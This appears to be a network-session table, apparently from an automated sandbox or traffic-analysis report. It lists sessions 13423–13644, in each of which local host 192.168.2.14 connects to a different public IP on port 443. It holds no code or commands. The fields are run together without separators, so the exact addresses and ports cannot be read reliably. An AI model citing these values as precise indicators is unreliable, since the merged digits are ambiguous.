                                      13423192.168.2.144307853.112.7.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13424192.168.2.1456420173.202.99.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13425192.168.2.145761079.151.102.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13426192.168.2.1440148122.112.169.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13427192.168.2.1449634130.44.30.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13428192.168.2.1440312138.119.202.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13429192.168.2.1443482101.78.168.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13430192.168.2.145155431.122.85.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13431192.168.2.1457004125.47.44.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13432192.168.2.1443418192.226.75.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13433192.168.2.144698817.249.133.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13434192.168.2.1441650188.191.57.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13435192.168.2.144697843.169.60.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13436192.168.2.143559688.191.1.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13437192.168.2.1434238152.203.182.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13438192.168.2.143653671.109.35.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13439192.168.2.1436354103.221.16.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13440192.168.2.1460612189.150.236.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13441192.168.2.1459964180.123.138.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13442192.168.2.1452576123.253.7.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13443192.168.2.145738612.113.74.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13444192.168.2.144863270.237.234.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13445192.168.2.1452412165.212.197.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13446192.168.2.1450934123.102.230.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13447192.168.2.1440648146.84.141.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13448192.168.2.1434014188.28.1.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13449192.168.2.1436794160.66.209.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13450192.168.2.1446474103.15.211.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13451192.168.2.144123232.19.75.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13452192.168.2.1435876128.162.23.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13453192.168.2.145635671.94.219.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13454192.168.2.1436398106.73.132.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13455192.168.2.145530477.46.215.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13456192.168.2.1442750205.29.12.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13457192.168.2.144605413.156.164.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13458192.168.2.1454514163.110.182.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13459192.168.2.1443882177.189.201.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13460192.168.2.143927892.167.52.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13461192.168.2.1444194221.33.95.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13462192.168.2.1453992118.20.217.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13463192.168.2.1441602164.66.4.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13464192.168.2.145081223.127.49.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13465192.168.2.1440152205.135.142.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13466192.168.2.144759686.176.119.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13467192.168.2.1438848107.205.209.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13468192.168.2.1443008195.114.120.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13469192.168.2.1446898103.105.105.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13470192.168.2.1434636202.44.9.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13471192.168.2.1447486153.154.121.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13472192.168.2.14364822.78.131.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13473192.168.2.1457724135.99.48.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13474192.168.2.1451564207.60.20.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13475192.168.2.1456380136.63.48.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13476192.168.2.1457546156.22.119.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13477192.168.2.143486275.102.149.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13478192.168.2.1441848118.119.215.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13479192.168.2.1432912123.90.228.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13480192.168.2.144039842.186.7.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13481192.168.2.1458308105.69.237.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13482192.168.2.144992623.82.55.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13483192.168.2.145256288.255.106.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13484192.168.2.1439306181.182.188.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13485192.168.2.1458162149.147.192.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13486192.168.2.1447660207.126.162.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13487192.168.2.145005452.164.45.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13488192.168.2.146006036.16.93.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13489192.168.2.144560446.148.134.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13490192.168.2.1444360147.199.113.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13491192.168.2.144636027.181.84.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13492192.168.2.1456930211.80.22.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13493192.168.2.1448178110.23.35.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13494192.168.2.1456052137.54.164.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13495192.168.2.1448844219.95.116.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13496192.168.2.1444270131.125.156.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13497192.168.2.1451244129.11.246.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13498192.168.2.1460848172.3.90.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13499192.168.2.1436074223.155.67.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13500192.168.2.1447810107.57.213.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13501192.168.2.1451782150.14.197.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13502192.168.2.1438794119.206.82.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13503192.168.2.1441546131.148.44.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13504192.168.2.144479414.134.81.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13505192.168.2.145541260.119.100.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13506192.168.2.1443468123.44.249.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13507192.168.2.144665278.38.4.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13508192.168.2.143330064.19.7.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13509192.168.2.1447512129.239.124.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13510192.168.2.1459058188.105.126.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13511192.168.2.1440760162.163.149.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13512192.168.2.1456866150.158.187.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13513192.168.2.1454960178.247.80.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13514192.168.2.144447882.249.16.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13515192.168.2.146039860.47.124.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13516192.168.2.1457256175.25.58.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13517192.168.2.1456054113.170.60.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13518192.168.2.145191867.47.146.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13519192.168.2.1456042186.178.97.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13520192.168.2.144443492.150.189.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13521192.168.2.143644644.211.19.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13522192.168.2.14371861.151.57.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13523192.168.2.1452414152.66.200.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13524192.168.2.1444924107.157.44.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13525192.168.2.1434142155.163.66.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13526192.168.2.145883440.39.42.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13527192.168.2.1448506135.27.163.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13528192.168.2.1447608130.72.199.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13529192.168.2.1457180120.191.80.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13530192.168.2.143824679.63.119.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13531192.168.2.143878431.18.148.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13532192.168.2.145970890.92.50.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13533192.168.2.1451538165.104.103.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13534192.168.2.1454572128.144.187.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13535192.168.2.1457768119.255.176.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13536192.168.2.1440252107.86.135.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13537192.168.2.1453498196.50.170.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13538192.168.2.1436006125.145.53.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13539192.168.2.1452830163.119.26.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13540192.168.2.144231441.16.50.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13541192.168.2.145779884.220.51.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13542192.168.2.1433098121.170.98.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13543192.168.2.144151639.67.28.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13544192.168.2.144735651.114.91.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13545192.168.2.145046064.41.8.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13546192.168.2.143853212.107.250.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13547192.168.2.145619867.95.94.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13548192.168.2.1451200102.28.186.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13549192.168.2.1436220120.36.168.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13550192.168.2.1438656101.234.122.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13551192.168.2.1455166166.144.153.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13552192.168.2.1439360165.235.208.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13553192.168.2.144983644.184.77.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13554192.168.2.145594478.215.105.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13555192.168.2.143797237.62.218.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13556192.168.2.1458502201.130.87.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13557192.168.2.1455972153.177.17.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13558192.168.2.1447600146.209.175.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13559192.168.2.1437116212.150.240.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13560192.168.2.143910871.92.206.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13561192.168.2.1445942116.62.77.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13562192.168.2.1439576142.51.244.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13563192.168.2.144529614.134.240.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13564192.168.2.1450998175.174.104.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13565192.168.2.145367840.33.104.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13566192.168.2.144379824.147.146.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13567192.168.2.1452486165.33.6.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13568192.168.2.1446890132.92.204.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13569192.168.2.144466263.55.82.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13570192.168.2.144285883.106.155.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13571192.168.2.1439276114.211.41.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13572192.168.2.1439074126.181.169.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13573192.168.2.144232834.80.194.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13574192.168.2.1460438174.173.0.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13575192.168.2.1456938154.102.205.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13576192.168.2.145674267.218.245.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13577192.168.2.144505661.19.76.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13578192.168.2.1448262192.166.60.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13579192.168.2.1447710139.8.192.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13580192.168.2.143976254.167.125.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13581192.168.2.1454190114.181.210.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13582192.168.2.1446012205.127.6.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13583192.168.2.144357623.67.222.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13584192.168.2.145869618.64.85.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13585192.168.2.1436210117.140.52.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13586192.168.2.1442646171.122.68.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13587192.168.2.145225242.235.95.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13588192.168.2.1455250160.15.201.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13589192.168.2.1433394188.213.176.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13590192.168.2.1435986128.142.57.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13591192.168.2.1439608103.93.99.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13592192.168.2.1435874160.130.111.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13593192.168.2.1449486206.246.8.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13594192.168.2.145818252.14.210.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13595192.168.2.1435156143.184.129.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13596192.168.2.1451756123.198.191.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13597192.168.2.1454572111.226.131.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13598192.168.2.1450062199.110.154.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13599192.168.2.1455256206.210.189.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13600192.168.2.14414262.122.17.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13601192.168.2.144800477.122.17.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13602192.168.2.1456592116.179.171.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13603192.168.2.1435018210.132.251.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13604192.168.2.1439170170.216.129.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13605192.168.2.143921694.107.201.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13606192.168.2.143622282.35.166.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13607192.168.2.1439226119.113.147.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13608192.168.2.1453206160.194.139.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13609192.168.2.1440732154.87.69.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13610192.168.2.143598212.181.248.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13611192.168.2.143947275.194.213.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13612192.168.2.144492087.250.131.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13613192.168.2.1438944146.61.171.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13614192.168.2.1454852128.190.38.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13615192.168.2.14605604.61.167.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13616192.168.2.1448264208.112.109.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13617192.168.2.145561017.231.37.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13618192.168.2.1440822166.238.197.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13619192.168.2.14475821.69.235.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13620192.168.2.145661298.79.90.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13621192.168.2.1459280221.46.5.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13622192.168.2.146026642.63.134.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13623192.168.2.144879485.144.118.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13624192.168.2.145966068.141.202.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13625192.168.2.144031038.72.105.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13626192.168.2.145796457.193.47.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13627192.168.2.1454756151.5.78.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13628192.168.2.144811644.139.125.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13629192.168.2.145207435.207.168.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13630192.168.2.1453860168.7.99.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13631192.168.2.14606849.103.22.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13632192.168.2.144421265.246.52.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13633192.168.2.1440252113.255.84.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13634192.168.2.1450898170.232.159.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13635192.168.2.1446598211.103.235.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13636192.168.2.143749647.101.234.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13637192.168.2.1453008148.61.255.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13638192.168.2.1436010156.51.226.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13639192.168.2.145279280.69.173.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13640192.168.2.1449148197.193.140.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13641192.168.2.1433594220.102.164.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13642192.168.2.145521268.96.191.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13643192.168.2.1441706155.9.140.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13644192.168.2.1440500174.51.62.12443
                                      TimestampBytes transferredDirectionData


